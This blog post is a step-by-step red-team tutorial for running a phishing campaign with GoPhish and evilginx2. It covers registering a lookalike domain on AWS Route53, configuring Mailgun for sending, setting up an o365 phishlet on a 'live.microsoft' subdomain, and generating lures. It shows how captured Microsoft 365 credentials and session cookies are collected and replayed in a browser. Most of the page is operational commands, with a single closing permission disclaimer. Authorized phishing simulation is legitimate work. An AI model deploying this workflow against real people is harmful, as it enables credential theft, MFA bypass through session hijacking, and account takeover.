Phishing


Hi Everyone

I’m back with another blog, i will cover how to Set-up and run a Phishing Campaign using GoPhish in a Red Teaming Engagement.

What is Phishing ?

Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers.

It occurs when an attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message.

Requirements

  • Route53 (Domain Registration)
  • AWS EC2 Instance
  • Mailgun Account

Route53 (Domain Registration)

  • Create an AWS Account and Login into AWS Console.

  • Search for Route53.

  • Click on Register Domain.

  • Enter the Domain name and click on check.

  • It shows the domain status is Unavailable, so we are gonna buy the domain which is available.

  • After purchasing the domain, the request goes to Domain Registration in Progress.

  • If the payment is already done, it will taken an hours to reflect the changes in the AWS Console

  • Successful domain registration looks like as shown below.

AWS EC2 Instance

  • Click on Launch Instance.

  • Choose Ubuntu Server (Free tier eligible) and proceed further as shown below.

  • Click on Review and Launch.

Note: It prompts the user to generate or use existing private key for accessing the Ubuntu System later via SSH.

  • Choose Create a new key pair.

  • Download a key pair.

  • After downloading the Private Key file, Launch the Instance.

Configuring Security Group

  • Click on the Security Group under the EC2 Dashboard

  • Create a new Security Group.

  • Enter the Basic Details.

  • Add the following Inbound Rules for SSH, DNS, HTTP ,HTTPS, GoPhish as shown below.

  • Security Group successfully created.

  • Now we need to assign this newly created Security Group to the Ubuntu EC2 Instance that we created.

  • Navigate to Instances —> Right Click on Instance —> Security —> Change Security Groups .

  • Remove the Existing Security Group.

  • Add the Newly Created Rule from the Drop Down.

  • Click on save to apply the changes.

Connecting to EC2 Instance via SSH

  • Move the Private Key (.pem) to .ssh .
mv Downloads/ubuntu.pem .ssh/
  • Change the Permission of the (.pem) .
chmod 600 .ssh/ubuntu.pem

  • SSH into the ubuntu server using the following command.
ssh -i .ssh/ubuntu.pem ubuntu@3.134.76.191 #mention your system public Ip Address

MailGun Domain Verification

Note: Mailgun allows to Add Domains only if the credit card verification is successful.

  • Navigate to Sending —> Domains as shown below.

  • Add new domain.

  • We have to add the DNS record for sending.

  • So go back to the AWS Route 53 and Choose Hosted Zone Details.

  • Click on create record and add those two TXT as shown below.

  • Verify DNS Setting will to verify the setting is updated properly or not.

  • To verify the TXT record manually using the following command.
dig geekfreak.click TXT

Installing GoPhish

Note: Make sure to install golang

apt install golang
  • Clone the GoPhish Github Repository using the following command
git clone https://github.com/gophish/gophish.git
  • Edit the config.json change the 127.0.0.1:3333 —> 0.0.0.0:3333

  • Build and Run gophish using the following command.
go build #building the binary
sudo ./gophish #run the binary

Note: username and password can be found from the logs after running the gophish binary.

  • Navigate to https://ipaddress:3333 to access the GoPhish Dashboard (Make sure to add https://)

  • After the login, it ask us to reset the credentials.

Creating SMTP Credentials

  • Post verification of DNS of the domain in Mailgun.

  • Click on the domain setting and choose SMTP.

  • Click on Reset Password and copy the password from clipboard.

  • Go to GoPhish Dashboard —> Sending Profiles.

  • Enter the SMTP username and Password and send a Test Email

  • Received the Test Email.

  • After the Email Sent Successful, save the Email Sending Profile.

Installing evilginx2

  • Install evilginx2 using the following command.
sudo apt-get -y install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
  • Start evilginx2.
sudo ./bin/evilginx -p ./phishlets/

Configuring evilginx2

  • Configure the domain name and ipaddress.
config domain geekfreak.click #the domain you bought for phishing
config ip 3.134.76.191 #your public ipaddress

  • Navigate to Route53 and Create few A records as shown below.

  • Verify manually using the following command.
dig live.microsoft.geekfreak.click A

  • Add the Phishlets.
phishlets hostname o365 live.microsoft.geekfreak.click
  • To enable the o365 Phishlets.
phishlets enable o365

  • Create lures and generate urls using the following command.
lures create o365 #after this command you will get a lures ID
lures get-url 0

  • Once someone enters the valid credentials, you will get those credentials in the logs.

sessions #list the number of captured sessions

sessions 3

Running a GoPhish Campaign

  • Login into GoPhish Dashboard.

  • Navigate to Users & Group and Click on New Group.

  • Enter the details of the people and email address.

  • Next step is to create the email template.

  • Click on Email Templates —> New Template.

  • Give the Name for the template and make a custom page as shown below.

  • Click on Save Template.

  • Navgiate to Campaigns —> New Campaign.

  • Campaign started successfully.

  • This is how the recipients receive the email.

  • Once the target users enter the credentials, it can be observed on the evilginx sessions and can be used to replay the cookie sessions via browser.

Reference:-
How to run a phishing attack simulation with GoPhish
How to Set Up a Phishing Campaign with Gophish
Practical Phishing with Gophish
Penetration Testing: Gophish Tutorial (Phishing Framework)

This post is only for Educational Purposes.

So please don’t test phishing on the target company that you don’t have permission.

Thanks a lot for reading !!!.

Related Posts

OAWSP Exam Review

Breaching AWS & Offensive AWS Security Professional

Subfinder Unleashed

Maximizing Subdomain Discovery with SecurityTrails

Patch Diff

Reviewing Code Changes

No One Talks About !

Gratefulness, Imposter Syndrome & Burnout

AWS Misconfigurations

Deep Dive into AWS Cloud Security

Reconnaissance

Red Teamer Perspective

Vishing

Social Engineering Tactics to Convince Victims

Hopper Disassembler

Bypassing Jail Break Detection

How I was able to revoke your Instagram 2FA

Bypassing Rate Limit using IP Rotation

Dependency Confusion

The Story of Supply Chain Attack